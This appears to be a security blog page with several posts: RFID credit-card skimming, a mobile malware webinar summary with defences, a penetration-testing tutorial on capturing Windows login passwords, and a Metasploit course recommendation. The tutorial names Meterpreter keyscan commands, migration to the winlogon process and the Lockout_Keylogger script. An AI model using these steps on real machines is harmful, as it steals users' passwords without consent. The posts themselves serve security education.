Pulling Passport, Drivers License and Credit Card Info from Thin Air

Can your ID be stolen by just walking past a hacker?

… According to the Identity Theft Resource Center, the Smart Card Alliance states that: “the financial payments industry has designed multiple layers of security throughout the traditional credit and debit payment systems to protect all parties involved in the payment transaction.” For contactless payments (RFID), the financial industry uses added security technology, both on the contactless device (RFID card), as well as in the processing network and system to prevent fraud.”

The article goes on to state that Industry standard encryption, Authentication, Confidentiality and Control are some of the security measures being used to protect your identity. But how well does this added security work?

Well, here is where things get really murky. You have some authorities claiming that contactless credit cards are safe, but you have others showing that they clearly aren’t.

Even Mythbusters has been caught up in the drama. In 2008, they were going to do a show on RFID, but caved in from external pressure not to do the show. Then, later they released a statement that they were not pressured to cancel the show.

In December of 2010, WREG, Channel 3 news in Memphis decided to put this to the test. In just one hour, Walt Augustinowicz (of Identity Stronghold) armed with a netbook computer and a wireless card reader he bought online for under $100 patrolled Beale Street looking for volunteers. He had 20 people volunteer to be scanned and of these, he was able to read the account number and expiration date of 5 people who carried RFID enabled credit cards…

Selection of an article written for The Office Survivalist, continue reading here.

Looks like Chris Paget has done a lot of research into this issue. Apparently the record for reading one of these chips is over 200 feet, and theoretically could be read from over a mile. For more info check out Chris’s Blackhat video “Extreme Range RFID”:

And Chris’s appearance on FoxNews:

Apparently, the security code on the back of the credit card is one of the saving graces. This is not transmitted wirelessly with the account info. But not all companies require this for a purchase. Most credit cards offer full refunds for fraudulent purchases and as far as is known, this technique has never been used to actually steal information.

It would seem hackers prefer databases that store thousands of credit card numbers compared to walking around and waving a RFID reader around people’s butts after a football game.

RFID blocking sleeves and wallets are available that prevent these signals from being read remotely. You can also ask for non-RFID credit cards from your bank. Passports have blocking material in the cover and currently only a few states issue RFID enabled cards.

New Mobile Malware and How to Defend Against it

Just watched a very good Mobile Malware update video from Hacking Exposed!

I haven’t really been keeping up with smart phone tech or smart phone viruses, but the webinar was very informative. The speaker covered several of the current malware threats. I was actually surprised to see how closely they behave to PC viruses.

Android.Nickispy once installed, has the ability to store all conversations and the GPS coordinates of the phone. The data is saved in an audio file in a directory called “Shangzhou” on the SD Card RAM. Then, just like in a PC bot virus, the files are pushed up to a command and control server.

The speaker’s theory about recording the GPS locations with the call was that some large un-named country that has been snarfing a log of military and intelligence data could focus on cell phones in a certain area.

He also mentioned Android:Soundcomber. Soundcomber is a proof of concept trojan. It records phone calls and uses audio processing to pull credit card numbers from voice communications. In the demo, the user calls a credit card company and on the first call speaks his (fake) credit card number into his phone. On the second call, the user enters his credit card number via the keypad.

Using audio processing, Soundcomber pulled the correct credit card numbers from both calls and displayed them on the command and control server.

A lot more was covered, including how hackers are creating apps that pass verification and are published in the app store, but when installed, pull down malicious updates. Bluetooth vulnerabilities and a “Truly Evil Hack” were also discussed.

Finally, how to defend against mobile malware was discussed. Surprisingly, the techniques were very similar to the PC world:

  • Don’t run programs from publishers that you don’t know and trust
  • Set strong passwords
  • Disable unnecessary startup apps
  • Disable unneeded Wi-fi, GPS and Bluetooth radios
  • Minimize remote unlocking services
  • and run Mobile whitelisting or Anti-Virus software

This is just a quick overview of the hour long video. The video should be posted on the Hacking Exposed website soon, check it out, it is very informative and well worth the time.

Capturing Windows Login Passwords with Keyscan & Lockout_Keylogger

Sometimes a penetration tester may have remote access to a user’s machine, but he may not have the user’s password. Maybe the user has a very long complex password that would just take too long to crack. What could he do?

Backtrack 5’s Metasploit Framework has a great utility for capturing keys pressed on a target machine. Once you have established a remote session, simply typing: Keyscan_start will start the built in key scanner. After a while, if you want to see what was typed simply enter “keyscan_dump”:

Here you can see from this demo key log dump that the user went to “google.com” and did a search for “Dallas Cowboys Stats”.

Now, if you look at the next key dump in the picture above, you see something odd. Looks like the <LWin> (Windows Key) and an “l” was pressed. When you press these keys on a Windows system, the computer goes into a locked mode and prompts you for your password to log back in.

The user must have locked his desktop, and went to get a cup of coffee. Everyone knows that you can’t read football stats without a good cup of joe. The user returned and logged back in. What luck, we have captured a login!

But wait a minute, why is there no password listed?

The problem is the way Windows security is laid out. Simply put, the active session (desktop) and winlogon (Login process) use different keyboard buffers. If you are sniffing the active session, you can not capture keys entered for a login, or vice versa.

You need to move your key logger to the session that you want to monitor. So in this case, simply migrating our meterpreter shell to the winlogon process puts us in the correct mode to look for passwords. Then start keyscan again:

In the picture above, the first key dump shows all of the keys pressed while the user was logged in. Which, because we are now monitoring the winlogon session key buffer, nothing is displayed. But since our target needed another cup of coffee to get through his busy day of web surfing, he locked his desktop and then logged in again. If you look at the second key dump in the picture above, you will see his full 27 character password.

Now, what would be great is if we could automate this process. I mean do you really want to just sit there and hang out until the user leaves his system? You could force his desktop into locked mode and make him log in again, but this is pretty suspicious. What if you could have meterpreter automatically find and migrate to the winlogon process, then scan the computer idle time and automatically put the user’s system into locked mode? Finally, what would be really nice is if the script notified you when the user logs back in and gives you a text dump of his password.

Meet “Lockout_Keylogger” (formerly called “smartlocker”) an amazing script made by CG and Mubix:

Lockout_Keylogger automates the entire process from beginning to end. The user walks away from his PC, the script waits a certain amount of idle time and then puts the computer into locked mode. Then, when he logs back in, it is already set to scan the keys pressed.

The password could be a simple 4 character password or a complex 30 character monster, it does not matter. Lockout_Keylogger intercepts it and displays it in plain text on the penetration tester’s machine.

Backtrack Metasploit Megaprimer on SecurityTube.net

The Metasploit Framework included with the Backtrack series is am amazing platform for penetration and security testing. The capabilities are just stunning. The problem is the learning curve can be kind of steep, especially for new users.

There are many video training tutorials out there and Offensive Security even offers the free “Metasploit Unleashed” training which is very good. But it would be nice to have a comprehensive video series that starts with the very basics of Metasploit and leads you through the entire platform to the more advanced features.

Look no further than Vivek Ramachandran’s “Metasploit Megaprimer” video series. Vivek has created a huge training session on Metasploit spanning almost 20 videos. The training is top notch, and very easy to follow.

Some of the topics covered include:

  • Meterpreter Basics and Using Stdapi
  • Meterpreter Extensions
  • Database Integration
  • Post Exploitation Kung Fu
  • Post Exploitation Privelege Escalation
  • Backdoors, Pivoting, Port Forwarding and much, much, more!

I had the absolute honor of working with Vivek as a technical editor on his just released book “BackTrack 5 Wireless Penetration Testing Beginner’s Guide“. He is one of the top security experts of India, has spoken at numerous security conferences, and runs the very popular website “SecurityTube”.

Vivek has an amazing ability to take very complex ideas and breaking them down into very easy to understand lessons. If you are new to Metasploit, or want to learn more about it, check out the Metasploit Megaprimer. It will be time well spent!